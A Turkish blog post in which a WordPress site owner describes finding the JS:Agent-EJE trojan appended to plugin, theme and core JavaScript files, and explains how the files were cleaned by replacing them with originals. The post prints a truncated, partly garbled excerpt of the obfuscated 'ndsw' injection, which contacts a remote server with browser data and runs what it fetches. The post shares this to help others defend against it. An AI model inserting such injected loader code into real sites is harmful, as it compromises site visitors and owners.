WordPress JS:Agent-EJE [Trj] virüsü ve çözümü

Bir kaç gündür siteme girdiğimde özellikle admin panelinde başka yerde henüz rastlamadım zira javascript çalıştıran kısımlar eklenti ve yeni yazı ekleme kısımlarıdır. Avast antivirüs aşağıdaki resimde gördüğünüz hataları vermektedir. Dosya yoluna baktığımda bir çok defa js dosyalarını görüyorum.

Sonra cpaneli açıp bu dosyalar arasındaki benzerlikleri aradım ve buldum. aşağıdaki kodu bu dosyaların en sonuna eklenmiş.

;if(ndsw===undefined){
(function (I, h) {
var D = {
I: 0xaf,
h: 0xb0,
H: 0x9a,
X: ‘0x95’,
J: 0xb1,
d: 0x8e
}, v = x, H = I();
while (!![]) {
try {
var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v(‘0x87’)) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
if (X === h)
break;
else
H’push’ + f(0x84) + ‘ge’] = function () {
var Y = f;
if (H[Y(‘0x8c’) + Y(0xae) + ‘te’] == 0x4 && H[Y(l.I) + ‘us’] == 0xc8)
h(H[Y(‘0xa7’) + Y(l.h) + Y(l.H)]);
}, Hf(e.h), I, !![]), Hf(e.H);
};
}, rand = function () {
var a = {
I: ‘0x90’,
h: ‘0x94’,
H: ‘0xa0’,
X: ‘0x85’
}, F = x;
return MathF(a.I) + ‘om’ + F(a.H)](0x24)F(a.X) + ‘tr’;
}, token = function () {
return rand() + rand();
};
(function () {
var Q = {
Iüeiaüieaü
V: ‘0x8b’,
K: 0xa6
}, m = { I: ‘0x9c’ }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + ‘ie’], V = X[U(Q.h) + U(‘0xa8’)][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U(‘0xac’)];
VU(0x9c) + U(0x92) == 0x0 && (V = VU(‘0x85’) + ‘tr’);
if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U(‘0x8f’) + V) && !J) {
var u = new HttpClient(), E = K + (U(‘0x98’) + U(‘0x88’) + ‘=’) + token();
u[U(‘0xa5’)](E, function (G) {
var j = U;
g(G, j(0xa9)) && Xj(T.I); devamı da var ama hepsini ekleyince yine bu sayfayı da zararlı olarak gösteriyor.

Hiç bir programlama dili bilmeyen biri bile bunu anlayabilir zira ben anladım ki bir zararlı kod. Mantıken de farklı işlere yarayan pluginlerin sonunda tüm js dosyalarında bu kodun olması mantıklı değil. Sonra bunları tek tek temizlemeye başladım.

Eklentileri tek tek indirip zip olarak yeniden yükledim. Js şeklinde arama yapıp gerekirse tema dosyalarını da kontrol edeceğim.

Bu durumun sakıncası ise sitenin google’da zararlı site olarak işaretlenip ziyaretçi sayısını düşürmesi.

İnternette çok araştırdım ama bir şey bulamadım en son avast uygulamasının uyarı verdiği dosya yollarını düzeltmeye başladım ama henüz kullanmadığım yerlerde bile bu olabilir. Kolay bir yolu varsa tavsiyelerinizi rica ederim.

Benim bulduğum yöntem tek tek düzeltmek ya da paket yüklemek.

Eklentileri paket halinde yükledim

Bütün eklentileri yüklü eklentiler kısmından yükledim hala hata veriyor. Bu defa da temaların js dosyalarına bulaşmış onları da bulaşmış derken avast bir uyarı daha verdi aşağıdaki gibi

wordpress sistemi dosyalarında da var.

Tüm dosyaları orjinalleri ile değiştirmem gerekecek gibi duruyor. Veri tabanı yedeği aldım. siz de her şeyden önce bir yedek alın.

Bunlar da hoşunuza gidebilir...

3 Cevaplar

  1. omr dedi ki:

    çözebildiniz mi?

    • bendelimiyim dedi ki:

      Tüm dosyaları orjinalleri ile değiştirdim. Bütün js dosyalarını tek tek açıp kontrol ettim. En sonunda siteye girip sitede gezinip avastın uyarı verdiği js dosyalarını dosya yöneticiden buldum. Sonra onları da açıp sonuna eklenen kodları sile sile gittim. Bu şekilde temizledim. Bir kaç saatimi aldı. Ama sonunda yaptım. Şu anda temiz görünüyor.

  2. CipsiGreen dedi ki:

    Teşekkürler güzel bir yazı olmuş.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.

WP Twitter Auto Publish Powered By : XYZScripts.com